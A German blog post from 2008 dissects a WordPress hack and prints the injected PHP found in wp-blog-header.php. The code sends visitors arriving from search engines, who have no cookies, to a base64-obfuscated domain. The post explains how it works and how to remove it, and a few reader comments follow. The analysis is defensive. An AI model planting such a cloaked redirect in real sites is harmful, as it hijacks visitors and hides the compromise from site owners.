« Tipps für ein sicheres Blog
Schwaches Bild »

Details zum 302-anyresults.net-Hack

Nachdem ich eben einem betroffenen Blogger helfen konnte, den heute morgen von mir beschriebenen Hack wieder zu entfernen, kann ich jetzt auch Details darüber berichten:

Der Schadcode ist/war (in diesem Fall) in der Datei wp-blog-header.php, die auch ein aktuelles Änderungsdatum aufwies. Direkt vor den korrekten PHP-Block wurde ein neuer geschrieben:

<?php $seref=array("google","msn","live","altavista","ask","yahoo",
  "aol","cnn","weather","alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower(
  $_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){
  header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/");
  exit; }?>

Löscht man diesen Code wieder aus der Datei heraus, ist das Problem gelöst1.

Erklärung des Codes

Für all jene, die vielleicht nicht programmieren können, aber wissen möchten, was denn genau passiert, hier eine kurze (grob inhaltliche) Erklärung des Codes:

Der (Schad-)Code überprüft zu Beginn gleich, ob der Benutzer von einer der in der ersten Zeile aufgeführten Suchmaschinen/Webseiten kommt2, wozu er den Referrer zurate zieht.

Wurde ein solches Suchwort im Referrer gefunden3 und wurde für die Domain noch kein Cookie angelegt (das passiert etwa dann, wenn man sich auf der Seite als Administrator anmeldet), dann erzeugt der Code eine passende Server-Meldung, so dass der Browser auf die Seite anyresults.net wechselt.

Und das war’s schon.

  1. 1 Eine mögliche Sicherheitslücke, die zum Einschleusen ausgenutzt wurde, ist damit aber natürlich nicht geschlossen! Lediglich die „Symptome“ sind kuriert.
  2. 2 Genauer gesagt prüft das Programm lediglich, ob die genannten Suchwörter irgendwo im Referrer auftauchen.
  3. 3 Deshalb bekommt man diese Weiterleitung auch nicht zu sehen, wenn man sich bereits auf der Seite bewegt hat, oder wenn man die Blog-Adresse direkt im Browser aufruft (etwa um zu sehen, ob das von Besuchern berichtete Problem wirklich exisitert).

Dieser Beitrag wurde am Freitag, 6. Juni 2008 um 12:39 Uhr veröffentlicht und unter Computer abgelegt. Du kannst die Kommentare zu diesen Eintrag durch den RSS 2.0 Feed verfolgen. Du kannst einen Kommentar schreiben oder ein TrackBack auf Deine Seite einrichten.

Tags: ,

6 Reaktionen zu “Details zum 302-anyresults.net-Hack”

  1. #1
    Mark GERMANY Windows XP Mozilla Firefox 2.0.0.14 schreibt:
    Freitag, 13. Juni 2008 um 15:30

    Gibts schon neuigkeiten woher der hack stammt bzw wie die header datei manipuliert wurde?

  2. #2
    Christian GERMANY Windows XP Mozilla Firefox 2.0.0.14 schreibt:
    Freitag, 13. Juni 2008 um 15:56

    Nein, gibt’s nicht. Ich war nicht selbst betroffen und konnte das nicht überprüfen.

  3. #3
    SLnet AUSTRIA Windows XP Internet Explorer 7.0 schreibt:
    Samstag, 14. Juni 2008 um 13:56

    Danke für den Hinweis. Hatte zwar noch nicht das Vergnügen, mit diesem Problem Bekanntschaft zu machen, aber ich bin ja immer gern auf alles vorbereitet. Finde Probleme dieser Art immer sehr lästig. Schad, dass es kein Allheilmittel gegen dagegen gibt.

Ping-/Trackbacks zu “Details zum 302-anyresults.net-Hack”

Einen Kommentar abgeben

This blog uses DigoWatchWP an anti-fraud plugin for Wordpress.